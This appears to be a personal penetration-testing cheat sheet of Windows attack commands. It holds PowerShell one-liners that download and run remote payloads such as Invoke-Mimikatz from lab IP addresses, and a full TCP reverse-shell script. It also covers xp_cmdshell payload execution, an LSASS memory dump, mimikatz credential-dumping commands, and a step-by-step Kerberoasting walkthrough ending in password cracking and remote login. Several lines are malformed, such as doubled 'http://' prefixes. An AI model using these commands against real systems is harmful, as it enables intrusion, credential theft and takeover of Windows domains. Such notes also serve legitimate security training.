Windows hacks
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"
On Web shell:
IEX (New-Object Net.WebClient).downloadString('
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
')
powershell IEX(New-Object Net.WebClient).DownloadFile('http://http://192.168.49.164/gori.ps1')
powershell IEX(New-Object Net.WebClient).downloadString('http://http://192.168.119.181/gori.ps1')
Transfer mimikatz to a Temp directory:
(New-Object Net.WebClient).DownloadFile("http://192.168.119.181:8080/mimikatz.exe","C:\Windows\Temp\mimikatz.exe")
certutil -urlcache -split -f http://192.168.119.212:80/tcp_power.ps1 C:\backup\Scripts\backup_powershell.ps1
\
powershell IEX(New-Object Net.WebClient).DownloadFile("http://192.168.119.188:8000/mimikatz.exe"),"C:\Windows\Users\Bethany\Documents\mimikatz.exe"
powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://192.168.119.146/newkb.ps1");Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://192.168.119.146:8080/stable.ps1\");"
$cred = New-Object System.Management.Automation.PSCredential('MSSQLSvc/DC_NAME\user', $secpasswd)
reverse shell not working???
To mitigate bad character issue on the reverse shell (ps1), we can first convert everything into UTF-16LE (This is how windows programs are constructed) and base64 encode it.
cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
this is converting UTF to little indian format > then base64
copy the input and use it to execute command
powershell.exe -nop -exec bypass -enc BASE64_COMMANDSSSSSS
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full
PNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"
MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full
1.Obtain SPN data with GetSPN.ps1 (Take notes on Service names and domain info)
2. copy nc.exe to the windows machine and get a reverse shell back(stable)
3. Once stable,
open powershell and do
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Servicename/domain:port"
4. open up mimikatz.(make sure you have the right version for the os ----> 32bit/64)
and dump kerbero tickets
kerberos::list /export
this should dump all the tickets and results will be saved into the victim's computer.
5. Copy the file over to the kali and make it to hashcat form with kirbi2johnn.py
Cracking a ticket:
python3 /home/kali/Downloads/kerberoast-master/tgsrepcrack.py ~/rockyou.txt kirby.kirby
6. Once cracked you can try to login to the account with evilrm (use the service name you obtained from the step 1)
❯ ./evil-winrm.rb -i IP -u User -p PASS
Mimikatz console (multiple commands)
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
# lsadump::sam
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
mimikatz cheatsheet:
and psexec.py /evilwinrm to getin to the admin shell.
Last modified 11mo ago